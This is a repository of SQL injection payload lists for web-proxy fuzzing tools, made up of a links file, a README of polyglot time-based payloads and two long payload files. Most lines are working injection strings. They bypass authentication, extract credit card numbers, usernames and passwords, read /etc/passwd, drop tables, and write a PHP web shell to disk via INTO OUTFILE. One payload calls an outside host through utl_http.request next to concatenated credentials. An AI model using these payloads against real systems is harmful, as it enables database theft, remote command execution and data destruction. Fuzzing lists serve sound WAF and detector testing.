├── LINKS.md ├── README.md ├── sql-rmccurdy.com.txt └── sqli-misc.txt /LINKS.md: -------------------------------------------------------------------------------- 1 | ## LINKS: 2 | * https://github.com/danielmiessler/SecLists/tree/master/Fuzzing 3 | * https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/sql-injection 4 | * https://github.com/tennc/fuzzdb/tree/master/dict/BURP-PayLoad ; https://github.com/tennc/fuzzdb/tree/master/attack-payloads/sql-injection 5 | * https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/Polyglots/SQLi_Polyglots.txt 6 | * https://github.com/1N3/IntruderPayloads ; https://github.com/1N3/IntruderPayloads/blob/master/burpattack_sqli_authbypass ; https://github.com/1N3/IntruderPayloads/blob/master/burpattack_sqli_error_based ; https://github.com/1N3/IntruderPayloads/blob/master/burpattack_sqli_time_based 7 | * https://github.com/foospidy/payloads ; https://github.com/foospidy/payloads/tree/master/other/sqli ; https://github.com/foospidy/payloads/tree/master/owasp/fuzzing_code_database/sqli ; https://github.com/foospidy/payloads/blob/master/owasp/jbrofuzz/sqli.txt 8 | * https://github.com/danTaler/detectionString 9 | * https://github.com/NickSanzotta/BurpIntruder 10 | * https://github.com/client9/libinjection/blob/master/data/sqli-misc.txt 11 | * https://rmccurdy.com/scripts/sql.txt 12 | * https://github.com/TeamMentor/TM_Temp_Scripts 13 | * https://github.com/arvinddoraiswamy/mywebappscripts/tree/master/FuzzLists 14 | * https://github.com/owtf/owtf/blob/develop/dictionaries/attack_vectors/web/sqli/basic.txt 15 | * 16 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # SQL-Injection-Payloads 2 | SQL Injection Payloads for Burp Suite, OWASP Zed Attack Proxy,... 
3 | 4 | ## POLYGLOTS: 5 | * avlidienbrunn 6 | * ```SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/``` 7 | * https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/ 8 | * ```IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),​SLEEP(1)))OR"*/``` 9 | * ```IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/``` 10 | * bl4ckh4ck5 11 | * ```/*$(sleep 5)`sleep 5``*/-sleep(5)#'/*$(sleep 5)`sleep 5` #*/||sleep(5)||'"||sleep(5)||"` ``` 12 | * ```/*$(sleep 5)`sleep 5``*/sleep(5)#'/*$(sleep 5)`sleep 5` #*/||sleep(5)||'"||sleep(5)||"` ``` 13 | * geeknik 14 | * ```if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/``` 15 | * 16 | -------------------------------------------------------------------------------- /sql-rmccurdy.com.txt: -------------------------------------------------------------------------------- 1 | 1 OR 1=1 2 | 1\' OR \'1\'=\'1 3 | 1\'1 4 | 1 EXEC XP_ 5 | 1 AND 1=1 6 | 1\' AND 1=(SELECT COUNT(*) FROM tablenames); -- 7 | 1 AND USER_NAME() = \'dbo\' 8 | \\\'; DESC users; -- 9 | 1\\\'1 10 | 1\' AND non_existant_table = \'1 11 | \' OR username IS NOT NULL OR username = \' 12 | 1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype=\'U\'), 1, 1))) > 116 13 | SQL Injection Cheet Sheet"},{"string": 14 | 1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = \'U\' -- 15 | 1 UNI/**/ON SELECT ALL FROM WHERE 16 | %31%27%20%4F%52%20%27%31%27%3D%27%31 17 | 1' OR '1'='1 18 | 1' OR '1'='1 19 | -------------------------------------------------------------------------------- /sqli-misc.txt: 
-------------------------------------------------------------------------------- 1 | # 2 | # Misc collected attacks from the wild and beyond.... 3 | # 4 | SO_BUY+AND+IF%281%3D1%2CBENCHMARK%281589466%2CMD5%280X41%29%29%2C0%29 5 | SO_BUY%3B+IF+%281%3D1%29+WAITFOR+DELAY+%2700%3A00%3A01%27-- 6 | SO_BUY+AND%28SELECT+1+FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%28%28SELECT+%28SELECT+CONCAT%280X7E%2C0X27%2CDATABASE%28%29%2C0X27%2C0X7E%29%29+FROM+%60INFORMATION_SCHEMA%60.TABLES+LIMIT+0%2C1%29%2CFLOOR%28RAND%280%29%2A2%29%29X+FROM+%60INFORMATION_SCHEMA%60.TABLES+GROUP+BY+X%29A%29+AND+1%3D1 7 | SO_BUY+AND%28SELECT+1+FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%28%28SELECT+%28SELECT+CONCAT%280X7E%2C0X27%2CUNHEX%28HEX%28CAST%28DATABASE%28%29+AS+CHAR%29%29%29%2C0X27%2C0X7E%29%29+FROM+%60INFORMATION_SCHEMA%60.TABLES+LIMIT+0%2C1%29%2CFLOOR%28RAND%280%29%2A2%29%29X+FROM+%60INFORMATION_SCHEMA%60.TABLES+GROUP+BY+X%29A%29+AND+1%3D1 8 | PHPX+AND+1%3D1+AND+XX%3DX 9 | PHPX+AND+CHAR%28124%29+USER+CHAR%28124%29%3D0+AND+XX%3DX 10 | SO_BUY%3B+IF+%281%3D1%29+WAITFOR+DELAY+%2700%3A00%3A01%27--%27 11 | SO_BUY%27%3B+IF+%281%3D1%29+WAITFOR+DELAY+%2700%3A00%3A01%27-- 12 | materials'%20and%201=1%20and%20''=' 13 | materials'%20and%201=2%20and%20''=' 14 | 1'%20and%20char(124)%2Buser%2Bchar(124)=0%20and%20'%25'=' 15 | 
-999.9'%20UNION%20ALL%20SELECT%200x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536%20and%20'x'='x 16 | 17 | # not sql 18 | #5000224%27%20UNION%20user_id%3E0-- 19 | 20 | -5000224%27%20UNION%20select%20user_id%20from%20users%20where%20user_id%3E0// 21 | 22 | # not sql 23 | #-5000224%27%20UNION%20user_id%3E0-- 24 | 5000224%27%20or%201=1-- 25 | 8+and+1=1-- 26 | 8+order+by+1-- 27 | 8-999.9+union+select+0 28 | 9-999.9+union+select+0-- 29 | 6334588%00%27%7C%7CSLEEP%283%29%26%26%271 30 | 6334588%20AND%20BENCHMARK%282999999%2CMD5%28NOW%28%29%29%29 31 | 6334588%26%26SLEEP%283%29 32 | 6334588%27%20AND%20BENCHMARK%282999999%2CMD5%28NOW%28%29%29%29%20AND%20%271 33 | 6334588%27%20AND%20SLEEP%283%29%20AND%20%271 34 | 6402272%27%20%61%6E%64%20%27%36%27%3D%27%356402272%27%20%61%6E%64%20%27%36%27%3D%27%366444930%20%61%6E%64%20%36%3D%35 35 | 6444930%20%61%6E%64%20%36%3D%36 36 | 6444930%27%20%61%6E%64%20%27%36%27%3D%27%35 37 | 6444930%27%20%61%6E%64%20%27%36%27%3D%27%36 38 | FOO%29%29+AND+UPDATEXML%281025%2CCONCAT%280X2E%2C0X3A7676693A%2C%28SELECT+%28CASE+WHEN+%281025%3D1025%29+THEN+1+ELSE+0+END%29%29%2C0X3A7471773A%29%2C7573%29+AND+%28%283045%3D3045 39 | 1+%2B+%28SELECT+6744+FROM+DUAL+WHERE+3176%3D3176+AND+3761%3D5879%23+%29 40 | 1234.5%29+ORDER+BY+1 41 | 
FOO%2C%28SELECT+%28CASE+WHEN+%284831%3D4831%29+THEN+1+ELSE+1%2F%28SELECT+0%29+END%29%29 42 | FOO%29%3B+IF%28%286681%3D9099%29%2CSELECT+6681%2CDROP+FUNCTION+CGIQ%29%3B%23+AND+%284596%3D4596 43 | FOO%2C%28SELECT+%28CASE+WHEN+%284763%3D4974%29+THEN+FOO+ELSE+4763%2A%28SELECT+4763+FROM+MYSQL.DB%29+END%29%29 44 | FOO%29+WHERE+9060%3D9060+AND+UPDATEXML%281025%2CCONCAT%280X2E%2C0X3A7676693A%2C%28SELECT+%28CASE+WHEN+%281025%3D1025%29+THEN+1+ELSE+0+END%29%29%2C0X3A7471773A%29%2C7573%29 45 | FOO%29%29%29+AND+3787%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT+%28CASE+WHEN+%283787%3D3787%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29 46 | FOO+%2B+%28SELECT+9350+WHERE+8850%3D8850+AND+3963%3D4777--++%29 47 | FOO%29+AND+4499%3D8923%23 48 | FOO%2CIIF%282510%3D9436%2CFOO%2C1%2F0%29 49 | FOO%29%29%3B+IF%28%288708%3D3788%29%2CSELECT+8708%2CDROP+FUNCTION+RIHR%29%3B%23+AND+%28%286571%3D6571 50 | FOO%29%29%29%3B+IF%28%289256%3D5702%29%2CSELECT+9256%2CDROP+FUNCTION+IRII%29%3B%23+AND+%28%28%283502%3D350 51 | %28SELECT+2299%3D%28%27%3AJQA%3A%27%7C%7C%28SELECT+CASE+2299+WHEN+2299+THEN+1+ELSE+0+END+FROM+RDB%24DATABASE%29%7C%7C%27%3AUGJ%3A%27%29%29 52 | %28SELECT+2811+FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280X3A6A71613A%2C%28SELECT+%28CASE+WHEN+%282811%3D2811%29+THEN+1+ELSE+0+END%29%29%2C0X3A75676A3A%2CFLOOR%28RAND%280%29%2A2%29%29X+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+X%29A%29 53 | FOO%2CEXTRACTVALUE%288571%2CCONCAT%280X5C%2C0X3A7676693A%2C%28SELECT+%28CASE+WHEN+%288571%3D8571%29+THEN+1+ELSE+0+END%29%29%2C0X3A7471773A%29%29 54 | %28CASE+WHEN+4518%3D5617+THEN+1+ELSE+NULL+END%29 55 | FOO%29%29%3B+SELECT+PG_SLEEP%285%29%3B-- 56 | FOO%29%29%29%3B+BEGIN+DBMS_LOCK.SLEEP%285%29%3B+END%3B--+AND+%28%28%288410%3D8410 57 | FOO%29%29+WAITFOR+DELAY+%270%3A0%3A5%27--+AND+%28%282114%3D2114 58 | FOO%29%29%29+WAITFOR+DELAY+%270%3A0%3A5%27--+AND+%28%28%281285%3D1285 59 | FOO+WAITFOR+DELAY+%270%3A0%3A5%27-- 60 | 1+order+by+1 61 | 
FOO%2C%28CAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT+%28CASE+WHEN+%281861%3D1861%29+THEN+1+ELSE+0+END%29%29%3A%3ATEXT%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29+AS+NUMERIC%29%29 62 | %28SELECT+GENERATE_SERIES%28FOO%2CFOO%2CCASE+WHEN+%289255%3D9830%29+THEN+1+ELSE+0+END%29+LIMIT+1%29 63 | -999.9+UNION+ALL+SELECT+%27R3DM0V3_HVJ_INJECTION%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- 64 | 999999.9+UNION+ALL+SELECT+%27R3DM0V3_HVJ_INJECTION%27%2CNULL-- 65 | -999.9+UNION+ALL+SELECT+%27R3DM0V3_HVJ_INJECTION%27-- 66 | -999.9+UNION+ALL+SELECT+%28SELECT+CAST%28CHAR%28114%29%2BCHAR%2851%29%2BCHAR%28100%29%2BCHAR%28109%29%2BCHAR%2848%29%2BCHAR%28118%29%2BCHAR%2851%29%2BCHAR%2895%29%2BCHAR%28104%29%2BCHAR%28118%29%2BCHAR%28106%29%2BCHAR%2895%29%2BCHAR%28105%29%2BCHAR%28110%29%2BCHAR%28106%29%2BCHAR%28101%29%2BCHAR%2899%29%2BCHAR%28116%29%2BCHAR%28105%29%2BCHAR%28111%29%2BCHAR%28110%29+AS+NVARCHAR%284000%29%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- 67 | 999.9+UNION+ALL+SELECT+%28SELECT+CAST%28CHAR%28114%29%2BCHAR%2851%29%2BCHAR%28100%29%2BCHAR%28109%29%2BCHAR%2848%29%2BCHAR%28118%29%2BCHAR%2851%29%2BCHAR%2895%29%2BCHAR%28104%29%2BCHAR%28118%29%2BCHAR%28106%29%2BCHAR%2895%29%2BCHAR%28105%29%2BCHAR%28110%29%2BCHAR%28106%29%2BCHAR%28101%29%2BCHAR%2899%29%2BCHAR%28116%29%2BCHAR%28105%29%2BCHAR%28111%29%2BCHAR%28110%29+AS+NVARCHAR%284000%29%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- 68 | 
999999.9+UNION+ALL+SELECT+CHR%28114%29%7C%7CCHR%2851%29%7C%7CCHR%28100%29%7C%7CCHR%28109%29%7C%7CCHR%2848%29%7C%7CCHR%28118%29%7C%7CCHR%2851%29%7C%7CCHR%2895%29%7C%7CCHR%28104%29%7C%7CCHR%28118%29%7C%7CCHR%28106%29%7C%7CCHR%2895%29%7C%7CCHR%28105%29%7C%7CCHR%28110%29%7C%7CCHR%28106%29%7C%7CCHR%28101%29%7C%7CCHR%2899%29%7C%7CCHR%28116%29%7C%7CCHR%28105%29%7C%7CCHR%28111%29%7C%7CCHR%28110%29-- 69 | CAT1_GALLERY_1+UNION+ALL+SELECT+%28SELECT+CAST%28CHAR%28114%29%2BCHAR%2851%29%2BCHAR%28100%29%2BCHAR%28109%29%2BCHAR%2848%29%2BCHAR%28118%29%2BCHAR%2851%29%2BCHAR%2895%29%2BCHAR%28104%29%2BCHAR%28118%29%2BCHAR%28106%29%2BCHAR%2895%29%2BCHAR%28105%29%2BCHAR%28110%29%2BCHAR%28106%29%2BCHAR%28101%29%2BCHAR%2899%29%2BCHAR%28116%29%2BCHAR%28105%29%2BCHAR%28111%29%2BCHAR%28110%29+AS+NVARCHAR%284000%29%29%29%2CNULL-- 70 | 1 - ORD('A') 71 | TRUE DIV(SELECT ORD(LEFT 72 | TRUE DIV(SELECT (ORD(LEFT 73 | TRUE DIV(SELECT ((ORD(LEFT 74 | 1 DIV(SELECT ORD(LEFT 75 | 1 DIV(SELECT (ORD(LEFT 76 | 0 UNION SELECT (1),2,3 77 | 1 AND (SELECT TOP 10 USERNAME FROM USERS); 78 | 1 AND SELECT 1 FROM T.TRANS_DATE -- 1 79 | 1 AND (SELECT 1 FROM T.TRANS_DATE -- 1 80 | 1 GROUP BY 1 HAVING 1 = 1 81 | 1 GROUP BY 1 HAVING '1' = 1 82 | 1 GROUP BY 1,TRANSID,ACCOUNTID HAVING 1=1 83 | 1 AND SELECT TOP 10 USERNAME FROM USERS -- 1 84 | 1001 union(select userid, ccnumber, '3', '4' from credit_cards) 85 | 1001 union((select userid, ccnumber, '3', '4' from credit_cards)) 86 | 1001 union/*/**/*/select userid, ccnumber, '3', '4' from credit_cards 87 | 1001 or 'A' = 'B' union select userid, ccnumber, '3', '4' from credit_cards 88 | '6334588?'||SLEEP(3)&&'1 89 | 1001*/*!50000(1)union*/all(select 1,ccnumber,3,4 from credit_cards) 90 | 1001*/*!50000(1)union select 1,ccnumber,load_file('/etc/passwd'),4 from credit_cards*/ 91 | (1001)union select-1,ccnumber,3,4 from credit_cards 92 | (1001)union select (1),ccnumber,3,4 from credit_cards 93 | (1001)union select @a,ccnumber,3,4 from credit_cards 94 | 1001-\N%0aunion select 
1,ccnumber,3,4 from credit_cards 95 | 1001 sounds like '1001' union select 1,ccnumber,3,4 from credit_cards 96 | 1001-'text' union select 1,ccnumber,3,4 from credit_cards 97 | 1001%2b@a union select 1,load_file('/etc/passwd'),3,4 from credit_cards 98 | ((1001)-1) union select 1,2,3,4 from credit_cards 99 | 1001'-@a union select 1,2,3,4 from credit_cards-- - 100 | '1001'-@a union select 1,2,3,4 from credit_cards 101 | ((1001)-1) union select 1,2,3,4 from credit_cards 102 | 1001 rlike(-1)union select 1,2,3,4 from credit_cards 103 | ## 1001 ----1 union select 1,2,3,4 from credit_cards 104 | 1001 or 'foo' union select 1,2,3,4 from credit_cards 105 | 1001 and @a union select 1,2,3,4 from credit_cards 106 | 1001 like @a-1 union select 1,2,3,4 from credit_cards 107 | 1001-\N-\N union select 1,2,3,4 from credit_cards 108 | (1001-\N-\N) union select 1,2,3,4 from credit_cards 109 | (1001-\N)-\N union select 1,2,3,4 from credit_cards 110 | 1001-\N union select 1,2,3,4 from credit_cards 111 | 1001-true union select 1,2,3,4 from credit_cards 112 | (1001-true) union select 1,2,3,4 from credit_cards 113 | (1001-'1') union select 1,2,3,4 from credit_cards 114 | (1001-@version) union select 1,2,3,4 from credit_cards 115 | 1-(1001-true) union select 1,2,3,4 from credit_cards 116 | 1001-false-false union select 1,2,3,4 from credit_cards 117 | 1001-false-NULL union select 1,2,3,4 from credit_cards 118 | 1001 rlike(1-NULL)union select 1,2,3,4 from credit_cards 119 | 1001 rlike(1-(NULL))union select 1,2,3,4 from credit_cards 120 | (1)-'1' union select 1,2,3,4 from credit_cards 121 | (1)-@version union select 1,2,3,4 from credit_cards 122 | (@version)-@version union select 1,2,3,4 from credit_cards 123 | (@version)-1 union select 1,2,3,4 from credit_cards 124 | (@version)-'1' union select 1,2,3,4 from credit_cards 125 | @version-@version union select 1,2,3,4 from credit_cards 126 | @version-1 union select 1,2,3,4 from credit_cards 127 | @version-'1' union select 1,2,3,4 from credit_cards 
128 | ('1')-'1' union select 1,2,3,4 from credit_cards 129 | 1001 rlike(-1-1)union select 1,2,3,4 from credit_cards 130 | 1001 rlike(1-1)union select 1,2,3,4 from credit_cards 131 | 1001 rlike(@version)union select 1,2,3,4 from credit_cards 132 | 1001 rlike(@version-1)union select 1,2,3,4 from credit_cards 133 | 1001 rlike(1-@version)union select 1,2,3,4 from credit_cards 134 | 1001 rlike('1')union select 1,2,3,4 from credit_cards 135 | # vv new variations 2013-04-10 nickg vv 136 | 1001 RLIKE ((1)) UNION SELECT 1 FROM CREDIT_CARDS 137 | 1001 RLIKE ((-1)) UNION SELECT 1 FROM CREDIT_CARDS 138 | 1001 RLIKE ((-"1")) UNION SELECT 1 FROM CREDIT_CARDS 139 | 1001 RLIKE (-(1)) UNION SELECT 1 FROM CREDIT_CARDS 140 | 1001 RLIKE (-(-1)) UNION SELECT 1 FROM CREDIT_CARDS 141 | 142 | # http://vagosec.org/2013/04/mysql-implicit-type-conversion/ 143 | # a'+'b encoded is a%27%2B%27b 144 | a%27%2B%27b 145 | ' OR 1='1 146 | 147 | # new variations 148 | X' != 'Y' = 0 = '1 149 | X' = 'X' = 0 = '1 150 | X' = 'X' = 'X' = 0 = '1 151 | X' - 'Y' - 0 = '1 152 | 153 | # part of parameter pollution 154 | 1) FROM USERS WHERE USERNAME= 155 | 156 | # nest pgsql mssql comments 157 | 1/* /*/ */ */ or 1=1- 158 | 1/* /* / */ */ or 1=1- 159 | 160 | # small sqli 161 | 1-- 162 | 1 -- 163 | 1 -- 164 | 1/* 165 | 1 /* 166 | 1 /* 167 | 1*1-- 168 | 1 * 1-- 169 | 1 * 1 -- 170 | 1*1/* 171 | 1 * 1/* 172 | 1 * 1 /* 173 | 1 * 1 /* 174 | @version-- 175 | @@version-- 176 | @version -- 177 | @version /* 178 | @version/* 179 | 180 | # thanks @d0znpp 181 | (select id from users limit 1,1) 182 | (select id-0 from users limit 1,1) 183 | # known bypass.. for now! 
184 | (select id,id,id,id from users limit 1,1) 185 | 186 | # some variations 187 | '1' union (select id from users limit 1,1) 188 | 1 union (select id from users limit 1,1) 189 | xxx union (select id from users limit 1,1) 190 | @version union (select id from users limit 1,1) 191 | 192 | '1' union (select 1 from users limit 1,1) 193 | 1 union (select 1 from users limit 1,1) 194 | xxx union (select 1 from users limit 1,1) 195 | @version union (select 1 from users limit 1,1) 196 | 197 | '1' union (select xxx from users limit 1,1) 198 | 1 union (select xxx from users limit 1,1) 199 | xxx union (select xxx from users limit 1,1) 200 | @version union (select xxx from users limit 1,1) 201 | 202 | '1' union (select 's' from users limit 1,1) 203 | 1 union (select 's' from users limit 1,1) 204 | xxx union (select 's' from users limit 1,1) 205 | @version union (select 's' from users limit 1,1) 206 | 207 | # thanks @LightOS 208 | -1 union(((select table_name from information_schema.tables limit 1,1))) 209 | '1' union(((select table_name from information_schema.tables limit 1,1))) 210 | @foo union(((select table_name from information_schema.tables limit 1,1))) 211 | id union(((select table_name from information_schema.tables limit 1,1))) 212 | 213 | # and again @LightOS 214 | test'-1/1/**/union(select table) 215 | test'-1 union(select table) 216 | test'-@version union (select table) 217 | test'-'xyz' union (select table) 218 | 1- @version union(select table_name from information_schema.tables limit 1,1) 219 | 1- 'xxx' union(select table_name from information_schema.tables limit 1,1) 220 | 1- union(select table_name from information_schema.tables limit 1,1) 221 | @version - @version union(select table_name from information_schema.tables limit 1,1) 222 | @version- 'xxx' union(select table_name from information_schema.tables limit 1,1) 223 | @version - 5 union(select table_name from information_schema.tables limit 1,1) 224 | 225 | # 226 | 1 into outfile 'asd' 227 | 1 into outfile 
'asd'-- 228 | '1' into outfile 'asd' 229 | '1' into outfile 'asd' -- 230 | @version into outfile 'asd' 231 | @version into outfile 'asd' -- 232 | 233 | 1 into outfile ('asd') 234 | '1' into outfile ('asd') 235 | @version into outfile ('asd') 236 | 237 | 1 into outfile substring('asd', 10, 1) 238 | '1' into outfile substring('asd', 10, 1) 239 | @version into outfile substring('asd', 10 1) 240 | 241 | 1 into outfile (substring('asd', 10, 1)) 242 | '1' into outfile (substring('asd', 10, 1)) 243 | @version into outfile (substring('asd', 10 1)) 244 | 245 | %28select+substr%0D%0A%28login%0D%0A%0D%0A%29%0D%0Afrom+users+limit+1%2C1%29 246 | union%20%28select+id+from+users+limit+1%2C1%29 247 | 248 | # 249 | # This is not valid SQL but designed to force a syntax error 250 | # http://www.modsecurity.org/testphp.vulnweb.com/listproducts.php?cat=1%0Aand+current_user=notthere() 251 | 1%0Aand+current_user=notthere() 252 | 1%0Aand+current_user=1 253 | 1%0Aand+current_user=@version 254 | 1%0Aand+current_user='junk' 255 | 1%0Aand+current_user=foo 256 | 257 | 258 | 259 | 1--%0a+union%0C-%28%20select+table_name+from+information_schema.tables+limit+1%2C1%29 260 | 1'--%0a+union%0C-%28%20select+table_name+from+information_schema.tables+limit+1%2C1%29 261 | @version--%0a+union%0C-%28%20select+table_name+from+information_schema.tables+limit+1%2C1%29 262 | 263 | -.1a%20union%20%28select+id+from+users+limit+1%2C1%29 264 | 265 | case 1 when 2 then 2 end 266 | case sin(1) when 2 then 2 end 267 | case '1' when 2 then 2 end 268 | case 1 when 's' then 2 end 269 | case when 2 then 3 end 270 | case when 's' then 3 end 271 | case when f(1) then 3 end 272 | 273 | -1 union select table_name asda from information_schema.tables 274 | -1 union select table_name "asda" from information_schema.tables 275 | -1 union select table_name `asda` from information_schema.tables 276 | -1 union select table_name as asda from information_schema.tables 277 | -1 union select table_name as "asda" from 
information_schema.tables 278 | -1 union select table_name as `asda` from information_schema.tables 279 | 280 | a'and(select(binary(/*!system_user()*/)))like'reading%25 281 | 282 | -1 union select @``"", table_name from information_schema.tables 283 | 'foo' union select @``"", table_name from information_schema.tables 284 | @version union select @``"", table_name from information_schema.tables 285 | 286 | select @version foo 287 | select @version "foo" 288 | select @version foo -- junk 289 | select @version "foo" -- junk 290 | 291 | $$pgsql evade$$ union select * from foo 292 | $foo$pgsql evade$foo$ union select * from foo 293 | 294 | u&'pgsql evade' union select * from foo 295 | U&'pgsql evade' union select * from foo 296 | 297 | U&'pgsql evade' uescape '!' union select * from foo 298 | 299 | _latin1'foo' union select * from foo 300 | _LATIN7'foo' union select * from foo 301 | _utf8'foo' union select * from foo 302 | 303 | REAL 1 union select * from foo 304 | 1::REAL union select * from foo 305 | 1::REAL::REAL union select * from foo 306 | 307 | -1 union select @``"", table_name from information_schema.tables 308 | !~1 union select table_name from information_schema.tables 309 | -1 union select @a`from 1`, table_name from information_schema.tables 310 | version() union select table_name from information_schema.tables 311 | -1 LOCK IN SHARE MODE UNION SELECT table_name from information_schema.tables 312 | 1 is unknown union select table_name from information_schema.tables 313 | true is not unknown for update union select table_name from information_schema.tables 314 | 1 for update union select 1 315 | 316 | # ht/ TK 317 | (true)-(true)union select table_name from information_schema.tables 318 | (@a)-(@a)union select table_name from information_schema.tables 319 | 320 | # ht/ @stamparm 321 | 1 OR (1 OR 1)-- 322 | (1) OR (1 OR 1)-- 323 | ((1) OR (1 OR 1))-- 324 | ((1) OR ((1 OR 1)))-- 325 | 1 OR ((1 OR 1)) -- 326 | 1 OR ((1) OR 1) -- 327 | 328 | # ht/ @stamparm 329 | 
(@x OR @y) UNION ALL SELECT name,email,password FROM users-- 330 | (@x OR (@y)) UNION ALL SELECT name,email,password FROM users-- 331 | ((@x) OR @y) UNION ALL SELECT name,email,password FROM users-- 332 | (@x) OR (@y) UNION ALL SELECT name,email,password FROM users-- 333 | @x) OR (@y) UNION ALL SELECT name,email,password FROM users-- 334 | @x OR (@y) UNION ALL SELECT name,email,password FROM users-- 335 | 336 | # ht/ @stamparm 337 | (SELECT 1 FROM DUAL) 338 | (SELECT @a FROM DUAL) UNION ALL SELECT 1, 2, 3-- 339 | (SELECT (1) FROM DUAL) 340 | (select @version from dual) 341 | (select (@version - 1) from dual) 342 | (select ('foo' - 1) from dual) 343 | (select 'foo' from dual) 344 | (select 1 foobar from dual) 345 | 346 | # previously had problems with operators made from two words 347 | # ht/@stamparm 348 | 1 and 1 not between 0 and 1 349 | 1 AND 1 SOUNDS LIKE 1 350 | 1 AND 1 NOT LIKE 0 351 | 352 | (1 AND 1) OR 2>1-- 353 | 354 | # ht/@FluxReiners 355 | '-(1 or 1) and 1=0 union select load_file('/etc/passwd'),credit_card,password from users-- - 356 | '-(-1 or -1) and 1=0 union 357 | '-(-(1) or -1) and 1=0 union 358 | '-((1) or -1) and 1=0 union 359 | 360 | # https://twitter.com/dsrbr/status/342132003270959104 361 | -1 union select null, listagg(login || ':' || pass,', ') within group (order by login) from users; 362 | -1 union select null, xmlagg(xmlelement("user",login || ':' || pass).getStringVal() from users; 363 | -1 union select null, stragg(login || ':' || pass ||', ') from users; 364 | 365 | -1 union select listagg(login || ':' || pass,', ') within group (order by login) from users; 366 | 367 | #ht ivan 368 | users.id%0D%0A%23asd%0D%0Aunion%0D%0A%23asd%0D%0Aselect%0D%0A%23asd%0D%0A--a-%0D%0A%23aaa%0D%0Aaa+%0D%0A%23asd%0D%0A--a-%0D%0A%23aaa%0D%0Afrom%0D%0A%23asd%0D%0A--a-%0D%0A%23aaa%0D%0Aasdasd 369 | 370 | # http://samincube.blogspot.ru/2013/06/time-based-sqli-on-google-coupon.html 371 | 1'=sleep(1)='1 372 | 373 | # 
https://twitter.com/dsrbr/status/343017094926962691 374 | 1 and select (utl_http.request('http://client9.com/') || select listagg(login || chr(58) || pass || ', ') within group (order by login) from dual) is not null; 375 | 376 | # https://twitter.com/dsrbr/status/341228356936814592 377 | -1 union select top 1 null, lead(pass, 0) over (order by pass) from users; 378 | 379 | # https://twitter.com/dsrbr/status/340018970054766592 380 | -1 union select null, array_to_json(array_agg(users))::text from users limit 1; 381 | 1 and (select array_to_json(array_agg(users))::text::bool from users limit 1; 382 | 383 | # http://www.exploit-db.com/exploits/25915/ 384 | ' UNION SELECT 0x3c3f7068702073797374656d28245f4745545b227272225d293b3f3e,null,null,null,null,null,null,null,null,null,null,null,null,null INTO OUTFILE 'afile.php' 385 | 386 | # http://blog.detectify.com/post/51651525114/the-ultimate-sql-injection-payload 387 | IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/ 388 | 389 | # misc secondary sql statements 390 | 1 and true; BEGIN DECLARE @xy varchar(8000) 391 | 1; BEGIN DECLARE @xy varchar(8000) 392 | x' and 1 = 0; BEGIN DECLARE 393 | x' AND 1=0; DROP TABLE TMP_DB; 394 | ' AND 1=0; DECLARE @S 